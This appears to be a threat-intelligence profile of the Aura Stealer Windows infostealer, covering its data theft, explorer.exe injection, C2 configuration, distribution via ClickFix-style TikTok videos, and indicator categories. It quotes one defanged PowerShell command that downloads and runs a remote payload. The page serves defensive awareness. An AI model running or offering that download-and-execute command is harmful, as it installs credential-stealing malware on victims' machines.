Aura Stealer is a Windows information-stealing malware family first observed in 2025 and marketed in underground forums as a low-cost stealer with Telegram-based sales and bot integration. It is designed to harvest sensitive data from infected systems, including saved browser credentials, authentication cookies, cryptocurrency wallet data, and credentials from other applications. Reporting also attributes support for theft from Chromium- and Gecko-based browsers, and later versions advertised improved decryption of protected data from newer Chromium releases through dynamically selected methods based on browser version.
Operationally, Aura Stealer has been observed injecting into explorer.exe, retrieving Base64-encoded configuration data from command-and-control infrastructure, executing theft tasks according to that configuration, and Base64-encoding collected data prior to exfiltration. Later advertised versions also claimed language and geofencing checks intended to avoid execution in Russia and allied countries. Aura Stealer has been associated with broader infostealer distribution trends that heavily relied on DLL sideloading and loader-based delivery chains.
Observed distribution methods include ClickFix-style social engineering, cracked-software lures, SEO poisoning, and social-media campaigns. A notable campaign used TikTok videos posing as activation guides for commercial software and subscription services, instructing victims to run malicious PowerShell commands that ultimately delivered Aura Stealer. It has also been distributed in malware chains involving downloader or loader components that fetched additional payloads.
Aura Stealer has been discussed alongside other commodity stealers such as LummaC2, Rhadamanthys, and ACRStealer, and some forum commentary has suggested a possible relationship with DefCrypt, although any formal linkage remains unconfirmed. The malware primarily targets Windows endpoints and fits the broader 2025–2026 trend of commodity infostealers emphasizing browser data theft, session theft, cryptocurrency targeting, and evasive execution techniques.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell: iex (irm slmgr[.]win/photoshop)
Mertens says that an additional payload will be downloaded, named source.exe, which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe).
The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
"Improved decryption of the latest versions of Chromium-based browsers (144+)... Now different versions of Chrome (before 143 / after 144) are decrypted with different elevators, and the method is selected dynamically"; and "listings typically include browser passwords, cookies, and session tokens."
20 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Stealer malware mentioned as possibly related to the crypting service DefCrypt.
Infostealer marketed on dark web forums; focuses on stealing Chromium-based browser data and includes version-aware, dynamic decryption logic to bypass Chrome’s application-bound encryption changes (notably Chrome 144+). Includes geo/language checks and CIS-region exclusions, and uses compile-time hashing of WinAPI names to reduce static indicators.
Information stealer marketed with Telegram bot integration and configurable options.
Infostealer that injects into explorer.exe, receives configuration from C2, steals information, and exfiltrates it in Base64-encoded form. Uses multiple C2 domains and specific API endpoints for communication.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.